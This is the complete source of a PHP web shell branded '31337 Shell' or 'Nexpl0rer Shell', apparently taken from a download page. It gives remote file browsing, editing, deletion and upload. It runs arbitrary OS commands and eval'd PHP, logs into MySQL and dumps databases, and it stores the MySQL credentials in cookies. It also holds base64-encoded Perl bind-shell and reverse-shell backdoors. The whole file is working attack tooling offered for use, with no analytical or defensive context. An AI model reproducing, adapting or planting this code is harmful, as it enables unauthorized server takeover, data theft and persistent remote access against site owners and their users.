31337 Shell by Nexen - PhP c0dah Fuck 2 all (fake) bl4ck h4t

advertisement
<?
/*
31337 Shell by Nexen - PhP c0dah
Fuck 2 all (fake) bl4ck h4t h4x00rZ (usual php n00bs)
thx to KiNgOfThEwOrLd 4 IdeA
*/
error_reporting(0);
// Function for table dump
function datadump ($table) {
# Creo la variabile $result
$result .= "# Dump of $table \n";
$result .= "# Dump DATE : " . date("d-M-Y") ."\n\n";
# Conto i campi presenti nella tabella
$query = mysql_query("select * from $table");
$num_fields = @mysql_num_fields($query);
# Conto il numero di righe presenti nella tabella
$numrow = mysql_num_rows($query);
# Passo con un ciclo for tutte le righe della tabella
for ($i =0; $i<$numrow; $i++)
{
$row = mysql_fetch_row($query);
# Ricreo la tipica sintassi di un comune Dump
$result .= "INSERT INTO ".$table." VALUES(";
# Con un secondo ciclo for stampo i valori di tutti i campi
# trovati in ogni riga
for($j=0; $j<$num_fields; $j++) {
$row[$j] = addslashes($row[$j]);
$row[$j] = ereg_replace("\n","\\n",$row[$j]);
if (isset($row[$j])) $result .= "\"$row[$j]\"" ; else $result .=
"\"\"";
if ($j<($num_fields-1)) $result .= ",";
}
# Chiudo l'istruzione INSERT
$result .= ");\n";
}
return $result . "\n\n\n";
}
// Getting Directory..
if ($_POST['dir'] == "") {
if ($_COOKIE['dir'] == "") {
$dir=realpath(".");
}
else
{
$dir=$_COOKIE['dir'];
}
}
else
{
$dir=$_POST['dir'];
setcookie("dir",$_POST['dir']);
}
if (strtoupper(substr(PHP_OS, 0, 3)) == 'LIN') {
(substr($dir,strlen($dir)-1,1) != "/") ? $dir .= "/" : print "";
}
// Getting something...
$safemode_off_msg = "<font color=green>Safe Mode: OFF</font><br />";
$safemode_on_msg = "<font color=red>Safe Mode: ON</font><br />";
$gpc_off_msg = "<font color=green>Magic Quotes: OFF</font><br />";
$gpc_on_msg = "<font color=red>Magic Quotes: ON</font><br />";
$auf_on_msg = "<font color=green>Allow URL Fopen: ON</font><br />";
$auf_off_msg = "<font color=red>Allow URL Fopen: OFF</font><br />";
$reglobals_on_msg = "<font color=green>Register Globals: ON</font><br
/>";
$reglobals_off_msg = stripslashes("<font color=red>Register Globals:
OFF</font><br />");
$uname = php_uname()."<br />";
(ini_get("safe_mode") == 0) ? $safemode = $safemode_off_msg : $safemode =
$safemode_on_msg;
(ini_get("magic_quotes_gpc") == 0) ? $gpc = $gpc_off_msg : $gpc =
$gpc_on_msg;
(ini_get("allow_url_fopen") == 1) ? $auf = $auf_on_msg : $auf =
$auf_off_msg;
(ini_get("register_globals") == 1) ? $reglobals = $reglobals_on_msg :
$reglobals = $reglobals_off_msg;
$freespace = disk_free_space($dir);
$totalspace = disk_total_space($dir);
$percentfree = ($freespace*100)/$totalspace;
$percentbusy = 100-$percentfree;
$freespace = intval((($freespace/1024)/1024)/1024);
$totalspace = intval((($totalspace/1024)/1024)/1024);
$freespace .= " GB";
$totalspace .= " GB";
$current_user = "Who are you? ".get_current_user()."<br />";
$uid = "Uid: ".getmyuid()." Gid: ".getmygid()."<br />";
if ($_POST['mode'] == "ls") {
//Directory listing
$output .= "<br /><br />Directory listing:<br /><div align=left>";
$opendir = opendir($dir)or print("<font color=red>Can't open
directory</font>");
while ($file=readdir($opendir)){
if ($dir == realpath(".")) {
if (is_file($file)){
$perms = fileperms($file);
$info = (($perms & 0x0100) ? 'r' : '-');
$info .= (($perms & 0x0080) ? 'w' : '-');
$info .= (($perms & 0x0800) ? 's' : 'x');
$output.= "| file |".$info."|".$file." - <a
href=\"javascript:document.fedit.modfile.value='".$file."';document.fedit
.submit();\">Edit</a> - <a
href=\"javascript:document.delfile.delfile.value='".$file."';document.del
file.submit();\">Delete</a><br />";
}
else
{
$perms = fileperms($file);
$info = (($perms & 0x0100) ? 'r' : '-');
$info .= (($perms & 0x0080) ? 'w' : '-');
$info .= (($perms & 0x0800) ? 's' : 'x' );
$output .= "| dir |".$info."|".$file." - <a
href=\"javascript:document.folder.dir.value='".$dir.$file."';document.fol
der.submit();\">Go</a><br />";
}
}
else
{
if (is_file($dir.$file)){
$perms = fileperms($file);
$info = (($perms & 0x0100) ? 'r' : '-');
$info .= (($perms & 0x0080) ? 'w' : '-');
$info .= (($perms & 0x0800) ? 's' : 'x' );
$output.= "| file |".$info."|".$file." - <a
href=\"javascript:document.fedit.modfile.value='".$file."';document.fedit
.submit();\">Edit</a> - <a
href=\"javascript:document.delfile.delfile.value='".$file."';document.del
file.submit();\">Delete</a><br />";
}
else
{
$perms = fileperms($file);
$info = (($perms & 0x0100) ? 'r' : '-');
$info .= (($perms & 0x0080) ? 'w' : '-');
$info .= (($perms & 0x0800) ? 's' : 'x' );
$output .= "| dir |".$info."|".$file." - <a
href=\"javascript:document.folder.dir.value='".$dir.$file."';document.fol
der.submit();\">Go</a><br />";
}
}
}
$output .= "</div>";
}
//Editing file...
if ($_POST['mode']=="edit") {
($dir==realpath(".")) ? $file=$_POST['modfile'] :
$file=$dir.$_POST['modfile'];
$content = file_get_contents($file);
$output .= "<form action=# method=post><input type=hidden name=mode
value=doedit><input type=hidden name=modfile
value='".$_POST['modfile']."'>
<textarea rows=20 cols=50
name=newtext>".htmlspecialchars($content)."</textarea><br /><input
type=submit value=edit></form>";
}
if ($_POST['mode']=="doedit") {
($dir==realpath(".")) ? $file=$_POST['modfile'] :
$file=$dir.$_POST['modfile'];
$output .= $file."<br />";
$fh = fopen($file, "w+")or die("<font color=red>Error: cannot open
file</font>");
fwrite($fh, stripslashes($_POST['newtext']))or die("<font
color=red>Error: cannot write to file</font>");
fclose($fh);
$output .= "Done.";
}
//Making file..
if ($_POST['mode'] == "mkfile") {
($dir==realpath(".")) ? $file=$_POST['mkfile'] :
$file=$dir.$_POST['mkfile'];
$output .= "<form action=# method=post><input type=hidden name=mode
value=domkfile><input type=hidden name=mkfile
value='".$_POST['mkfile']."'>
<textarea rows=20 cols=50 name=text></textarea><br /><input type=submit
value=make></form>";
}
if ($_POST['mode'] == "domkfile") {
($dir==realpath(".")) ? $file=$_POST['mkfile'] :
$file=$dir.$_POST['mkfile'];
$fh = fopen($file, "w+")or die("<font color=red>Error: cannot create
file</font>");
fwrite($fh, stripslashes($_POST['text']))or die("<font color=red>Error:
cannot write to file</font>");
fclose($fh);
$output .= "Made.";
}
//Deleting file..
if ($_POST['mode'] == "delfile") {
($dir==realpath(".")) ? $file=$_POST['delfile'] :
$file=$dir.$_POST['delfile'];
unlink($file)or die("<font color=red>Error: cannot delete file</font>");
$output .= "File deleted.";
}
// cmd...
if ($_POST['mode'] == "cmd") {
switch ($_POST['func']) {
case "system":
system(stripslashes($_POST['cmd']));
die();
break;
case "popen":
$handle = popen($_POST['cmd'].' 2>&1', 'r');
echo "'$handle'; " . gettype($handle) . "\n";
$read = fread($handle, 2096);
echo $read;
pclose($handle);
die();
break;
case "shell_exec":
shell_exec(stripslashes($_POST['cmd']));
die();
break;
case "exec":
exec(stripslashes($_POST['cmd']));
die();
break;
case "passthru":
passthru(stripslashes($_POST['cmd']));
die();
break;
}
die();
}
// upload
if ($_POST['mode'] == "uploadz") {
$percorso = $_FILES['miofile']['tmp_name'];
$nome = $_FILES['miofile']['name'];
if (move_uploaded_file($percorso, $dir.$nome))
{
$output .= "<br><br>$nome Has Been Saved!";
}
else { $output = "<font color=red>Cannot upload</font>"; }
}
// rename
if ($_POST['mode'] == "renfile") {
rename($dir.$_POST['oldname'], $dir.$_POST['newname'])or die("<font
color=red>Cannot rename file</font>");
$output = "File renamed.";
}
// Bind port
if ($_POST['mode'] == "bind") {
$sourz['windows'] =
base64_decode("IyEvdXNyL2Jpbi9wZXJsDQojIFBlcmwgQmFja2QwMHIgQmluRCBTaGVsbA
0KIyBuMHQgdmVyeSBwcml2OA0KIyBjMGRlZCBieSBOZXhlbiAtMzEzMzcgcGhwIGMwZGFoIA0
KIyAtPSBOZXhlbiByMHggPS0NCnVzZSBTb2NrZXQ7ICNwZXIgZ2VzdGlyZSBpIHNvY2tldA0K
dXNlIEZpbGVIYW5kbGU7ICMgcGVyIGxcJ2F1dG9mbHVzaA0KJG1heF9jb25uPTEwOw0KJHBvc
nRhX2xvY2FsZT0zMTMzNzsNCiRwYWRkcl9sb2NhbGU9cGFja19zb2NrYWRkcl9pbigkcG9ydG
FfbG9jYWxlLElOQUREUl9BTlkpOw0Kc29ja2V0KFNFUlYsQUZfSU5FVCxTT0NLX1NUUkVBTSx
cJ3RjcFwnKSB8fCBkaWUoXCJFcnJvcmU6ICQhXCIpOyAgI3NlcnZlci1zb2NrZXQNCnNldHNv
Y2tvcHQoU0VSVixTT0xfU09DS0VULFNPX1JFVVNFQUREUiwxKSB8fCBkaWUoXCJFcnJvcmU6I
CQhXCIpOw0KYmluZChTRVJWLCRwYWRkcl9sb2NhbGUpIHx8IGRpZShcIkVycm9yZTogJCFcIi
k7DQpsaXN0ZW4oU0VSViwkbWF4X2Nvbm4pIHx8IGRpZShcIkVycm9yZTogJCFcIik7DQpteSA
kcGFkZHJfc2luZz1hY2NlcHQoU0lORywgU0VSVik7ICNhY2NldHRvIGxhIGNvbm5lc3Npb25l
IGRhbCBjbGllbnQNCm15KCRzaW5nX3BvcnRhLCRzaW5nX2FkZHIsJGdldCk9dW5wYWNrX3NvY
2thZGRyX2luKCRwYWRkcl9zaW5nKTsNClNJTkctPmF1dG9mbHVzaCgpOw0Kb3BlbihTVERJTi
wgXCI+JlNJTkdcIik7DQpvcGVuKFNURE9VVCxcIj4mU0lOR1wiKTsNCm9wZW4oU1RERVJSLFw
iPiZTSU5HXCIpOw0KZXhlYyhcJ0M6XFx3aW5kb3dzXFxzeXN0ZW0zMlxcY21kLmV4ZVwnKTsN
CmNsb3NlKFNJTkcpOw==");
$sourz['linux'] =
base64_decode("IyEvdXNyL2Jpbi9wZXJsDQojIFBlcmwgQmFja2QwMHIgQmluRCBTaGVsbA
0KIyBuMHQgdmVyeSBwcml2OA0KIyBjMGRlZCBieSBOZXhlbiAtMzEzMzcgcGhwIGMwZGFoIA0
KIyAtPSBOZXhlbiByMHggPS0NCnVzZSBTb2NrZXQ7ICNwZXIgZ2VzdGlyZSBpIHNvY2tldA0K
dXNlIEZpbGVIYW5kbGU7ICMgcGVyIGxcJ2F1dG9mbHVzaA0KJG1heF9jb25uPTEwOw0KJHBvc
nRhX2xvY2FsZT0zMTMzNzsNCiRwYWRkcl9sb2NhbGU9cGFja19zb2NrYWRkcl9pbigkcG9ydG
FfbG9jYWxlLElOQUREUl9BTlkpOw0Kc29ja2V0KFNFUlYsQUZfSU5FVCxTT0NLX1NUUkVBTSx
cJ3RjcFwnKSB8fCBkaWUoXCJFcnJvcmU6ICQhXCIpOyAgI3NlcnZlci1zb2NrZXQNCnNldHNv
Y2tvcHQoU0VSVixTT0xfU09DS0VULFNPX1JFVVNFQUREUiwxKSB8fCBkaWUoXCJFcnJvcmU6I
CQhXCIpOw0KYmluZChTRVJWLCRwYWRkcl9sb2NhbGUpIHx8IGRpZShcIkVycm9yZTogJCFcIi
k7DQpsaXN0ZW4oU0VSViwkbWF4X2Nvbm4pIHx8IGRpZShcIkVycm9yZTogJCFcIik7DQpteSA
kcGFkZHJfc2luZz1hY2NlcHQoU0lORywgU0VSVik7ICNhY2NldHRvIGxhIGNvbm5lc3Npb25l
IGRhbCBjbGllbnQNCm15KCRzaW5nX3BvcnRhLCRzaW5nX2FkZHIsJGdldCk9dW5wYWNrX3NvY
2thZGRyX2luKCRwYWRkcl9zaW5nKTsNClNJTkctPmF1dG9mbHVzaCgpOw0Kb3BlbihTVERJTi
wgXCI+JlNJTkdcIik7DQpvcGVuKFNURE9VVCxcIj4mU0lOR1wiKTsNCm9wZW4oU1RERVJSLFw
iPiZTSU5HXCIpOw0KZXhlYyhcJy9iaW4vc2hcJyk7DQpjbG9zZShTSU5HKTs=");
(strtoupper(substr(PHP_OS,0,3)) == "WIN") ? $source = $sourz['windows'] :
$source = $sourz['linux'];
$fh = fopen("bind.pl", "w+")or die("error.");
fwrite($fh, $source)or die("error.");
fclose($fh);
passthru("perl bind.pl");
unlink("bind.pl");
}
// Reverse c0nn
if ($_POST['mode'] == "reverse") {
$source['linux'] =
base64_decode("IyEvdXNyL2Jpbi9wZXJsDQp1c2UgU29ja2V0Ow0KJGhvc3QgPSAkQVJHVl
swXTsNCiRwb3J0ID0gJEFSR1ZbMV07DQoNCiAgICBpZiAoISRBUkdWWzBdKSB7DQogIHByaW5
0ZiAiWyFdIFVzYWdlOiBwZXJsIGRjMi5wbCA8SG9zdD4gPFBvcnQ+XG4iOw0KICBleGl0KDEp
Ow0KfQ0KcHJpbnQgIlsrXSBDb25uZWN0aW5nIHRvICRob3N0XG4iOw0KJHByb3QgPSBnZXRwc
m90b2J5bmFtZSgndGNwJyk7ICMgdSBjYW4gY2hhbmdlIHRoaXMNCnNvY2tldChTRVJWRVIsIF
BGX0lORVQsIFNPQ0tfU1RSRUFNLCAkcHJvdCkgfHwgZGllICgiWy1dIFVuYWJsZSB0byBDb25
uZWN0ICEiKTsNCmlmICghY29ubmVjdChTRVJWRVIsIHBhY2sgIlNuQTR4OCIsIDIsICRwb3J0
LCBpbmV0X2F0b24oJGhvc3QpKSkge2RpZSgiWy1dIFVuYWJsZSB0byBDb25uZWN0ICEiKTt9D
QogIG9wZW4oU1RESU4sIj4mU0VSVkVSIik7DQogIG9wZW4oU1RET1VULCI+JlNFUlZFUiIpOw
0KICBvcGVuKFNUREVSUiwiPiZTRVJWRVIiKTsNCnByaW50ICItLS0tLS0tLS0tLS0tLS0tLS0
tLS0tLS0tLS0tLS0tLS0tLS0tLS1cbiI7DQpwcmludCAiPSAgICAgIENvbm5lY3RNZSAoQmFj
ayBCYWNrZG9vcikgICAgICA9XG4iOw0KcHJpbnQgIj0gICAgIElSQU4gSEFDS0VSWiBTRUNVU
klUWSBURUFNICAgICAgPVxuIjsNCnByaW50ICI9ICAgICAgICAgIGNvZGVkIGJ5IEhlc3NhbS
14ICAgICAgICAgID1cbiI7DQpwcmludCAiLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0
tLS0tLS0tLS0tXG4iOw0KICBleGVjIHsnL2Jpbi9zaCd9ICctYmFzaCcgLiAiXDAiIHggNDsg
");
$source['windows'] =
base64_decode("IyEvdXNyL2Jpbi9wZXJsDQp1c2UgU29ja2V0Ow0KJGhvc3QgPSAkQVJHVl
swXTsNCiRwb3J0ID0gJEFSR1ZbMV07DQoNCiAgICBpZiAoISRBUkdWWzBdKSB7DQogIHByaW5
0ZiAiWyFdIFVzYWdlOiBwZXJsIGRjMi5wbCA8SG9zdD4gPFBvcnQ+XG4iOw0KICBleGl0KDEp
Ow0KfQ0KcHJpbnQgIlsrXSBDb25uZWN0aW5nIHRvICRob3N0XG4iOw0KJHByb3QgPSBnZXRwc
m90b2J5bmFtZSgndGNwJyk7ICMgdSBjYW4gY2hhbmdlIHRoaXMNCnNvY2tldChTRVJWRVIsIF
BGX0lORVQsIFNPQ0tfU1RSRUFNLCAkcHJvdCkgfHwgZGllICgiWy1dIFVuYWJsZSB0byBDb25
uZWN0ICEiKTsNCmlmICghY29ubmVjdChTRVJWRVIsIHBhY2sgIlNuQTR4OCIsIDIsICRwb3J0
LCBpbmV0X2F0b24oJGhvc3QpKSkge2RpZSgiWy1dIFVuYWJsZSB0byBDb25uZWN0ICEiKTt9D
QogIG9wZW4oU1RESU4sIj4mU0VSVkVSIik7DQogIG9wZW4oU1RET1VULCI+JlNFUlZFUiIpOw
0KICBvcGVuKFNUREVSUiwiPiZTRVJWRVIiKTsNCnByaW50ICItLS0tLS0tLS0tLS0tLS0tLS0
tLS0tLS0tLS0tLS0tLS0tLS0tLS1cbiI7DQpwcmludCAiPSAgICAgIENvbm5lY3RNZSAoQmFj
ayBCYWNrZG9vcikgICAgICA9XG4iOw0KcHJpbnQgIj0gICAgIElSQU4gSEFDS0VSWiBTRUNVU
klUWSBURUFNICAgICAgPVxuIjsNCnByaW50ICI9ICAgICAgICAgIGNvZGVkIGJ5IEhlc3NhbS
14ICAgICAgICAgID1cbiI7DQpwcmludCAiLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0
tLS0tLS0tLS0tXG4iOw0KICBleGVjKCdDOlx3aW5kb3dzXHN5c3RlbTMyXGNtZC5leGUnKTs=
");
(strtoupper(substr(PHP_OS,0,3)) == "WIN") ? $sourz = $source['windows'] :
$sourz = $source['linux'];
$fh = fopen("reverse.pl", "w+")or die("error.");
fwrite($fh, $sourz)or die("error.");
fclose($fh);
$output = passthru("perl reverse.pl ".$_POST['ip']." ".$_POST['port']);
unlink("reverse.pl");
}
// MySQL Login
if ($_POST['mode'] == "loginsql") {
setcookie("mysql_user", $_POST['user']);
setcookie("mysql_pass",$_POST['pass']);
setcookie("mysql_host",$_POST['host']);
$link = mysql_connect($_POST['host'], $_POST['user'], $_POST['pass'])or
die(mysql_error());
$output = "<form action=# method=post><input type=hidden name=mode
value=sql_query>
<input type=text name=dbname value='database name'><br><br><input
type=text name='query' value='sql quey'><br><br><input type='submit'
value='Esegui Query'></form><br /><br />";
$output .= "<form action=# method=post><input type=hidden name=mode
value=dump_db><input type=text name=dbname><input type=submit
value=DumpDb></form>";
}
// MySQL Query
if ($_POST['mode'] == "sql_query") {
$link = mysql_connect($_COOKIE['mysql_host'], $_COOKIE['mysql_user'],
$_COOKIE['mysql_pass'])or die(mysql_error());
(isset($_POST['dbname'])) ? mysql_select_db($_POST['dbname']) : print "";
$query = mysql_query(stripslashes($_POST['query']))or die(mysql_error());
while ($risultato = mysql_fetch_array($query))
{
foreach ($risultato as $par => $val) {
(is_numeric($par)) ? $output .= "" : $output .= $par." => ".$val."<br
/>";
}
}
$output .= "<form action=# method=post><input type=hidden name=mode
value=sql_query>
<input type=text name=dbname value='database name'><br><br><input
type=text name='query' value='sql query'><br><br><input type='submit'
value='Esegui Query'></form></center>";
}
// MySQL Dump
if ($_POST['mode'] == "dump_db") {
$dump = "# Dumped with Nexpl0rerSh \n";
$db = $_POST['dbname'];
$link = mysql_connect($_COOKIE['mysql_host'], $_COOKIE['mysql_user'],
$_COOKIE['mysql_pass'])or die(mysql_error());
(isset($_POST['dbname'])) ? mysql_select_db($_POST['dbname']) : print "";
$q = mysql_query("SHOW TABLES")or die(mysql_error());
while ($table = mysql_fetch_array($q)) {
$dump .= datadump($table[0]);
}
$file_name = $db.".sql";
Header("Content-type: application/octet-stream");
Header("Content-Disposition: attachment; filename = $file_name");
echo $dump;
die();
}
// MkDir
if ($_POST['mode'] == "mkdir") {
chdir($dir)or die("Error.");
if (mkdir($_POST['mkdir'])) {
$output = "Directory created.";
}
}
// Eval
if ($_POST['mode'] == "eval") {
eval(stripslashes($_POST['eval']));
die();
}
if ($_POST['mode']=="phpinfo") {
phpinfo();
die();
}
?>
<title><?="[nexpl0rer@".getenv("HTTP_HOST")." ~]"?></title>
<style type="text/css">
<!-.Stile1 {
color: #000000;
font-size: 24px;
font-weight: bold;
font-family: Geneva, Arial, Helvetica, sans-serif;
}
-->
</style>
<table width="100%" height="100%" border="0" cellpadding="0"
cellspacing="0">
<tr height="30%">
<td height="19"><table bgcolor="#CCCCCC" width="100%" height="149"
border="0" cellpadding="0" cellspacing="0">
<tr>
<td><div align="center" class="Stile1">Nexpl0rer Shell | PHP R0X
| MADE BY NEXEN </div></td>
</tr>
</table>
</td>
</tr>
<tr height="70%">
<td><table bgcolor="#CCCCCC" width="100%" height="526" border="0"
cellpadding="0" cellspacing="0">
<tr>
<td width="24%"><form name=fedit action=# method=post><input
type=hidden name=mode value=edit>
File t0 edit?
<input type=text name=modfile size="12"><input type=submit
value=edit></form><form action=# method=post><input type=hidden name=mode
value=mkfile>
File t0 make
<input type=text name='mkfile' size="12"><input type=submit
value=make></form>
<form action=# name='delfile' method=post><input
type=hidden name=mode value=delfile>
<span class="Stile2">File t0 delete</span>:
<input type=text name='delfile' size="12"><input type=submit
value=unlink></form><form method="post" action="#"
enctype="multipart/form-data"><input type="hidden" name="mode"
value="uploadz" />
file t0 upl0ad:
<input type="file" value="Load..." name="miofile" />
<input type="submit" name="ok" value="Do Upload" /></form><form action=#
method=post><input type="hidden" name="mode" value="renfile" />Rename
file:<input type="text" name="oldname" value="0ld name" size="12"
/><input type="text" name="newname" value="New name" size="12" /><input
type="submit" value="rename" /></form><form action="#"
method="post"><input type="hidden" name="mode" value="mkdir" />Make Dir:
<input type="text" name="mkdir" /><input type="submit" value="make"
/></form> </td>
<td width="51%" style="border:#000000 solid 1px;"
align="center"><form action="#" method="post"><input type="hidden"
name="mode" value="phpinfo" /><input type="submit" value="[PHPInfo]"
/></form><?=$uname?>
Free space: <?=$freespace?> || Total space: <?=$totalspace?>
(<?=$percentbusy?>% busy)<br />
<?=$current_user?><?=$uid?>
||<?=$safemode?> || <?=$gpc?> || <?=$auf?> || <?=$reglobals?>
<br>
<br>
<form action=# method=post name="folder" id="folder">
<input type=hidden name='mode' value='ls'>
folder:
<input type=text value='<?=$dir?>' name='dir'><input
type=submit value=change/list>
</form><?=$output?><br>
<br></td>
<td width="25%"><form action=# method=post><input type=hidden
name=mode value=cmd>
<span class="Stile2">Cmd:</span><input tpye=text
name=cmd><select name="func">
<option selected="selected">system</option>
<option>passthru</option>
<option>exec</option>
<option>shell_exec</option>
<option>popen</option>
</select><input type=submit value=exec></form><form
action="#" method="post"><input type=hidden name=mode value=reverse
/>BackConn: <input name="ip" type="text" value="ip.." size="12" /><input
name="port" type="text" value="port..." size="2" />
<input type="submit" value="reverse" /></form><form action=#
method="post"><input type="hidden" name="mode" value="bind" />
Binding port...
<input type=submit value="Bind port 31337" /></form><form
action="#" method="post"><input type=hidden name=mode value=loginsql />
Mysql:
<input name="user" type="text" value="user" size="12" />
<input type="text" size="12" name="pass" value="pass" /><input
type="text" name="host" size="12" value="host" /><input type="submit"
value="connect" /></form><form method="post" action="#"><input
type="hidden" value="eval" name="mode" />PHP Code: <input type="text"
name="eval" /><input type="submit" value="Eval" /></form></td>
</tr>
</table></td>
</tr>
</table>
Herunterladen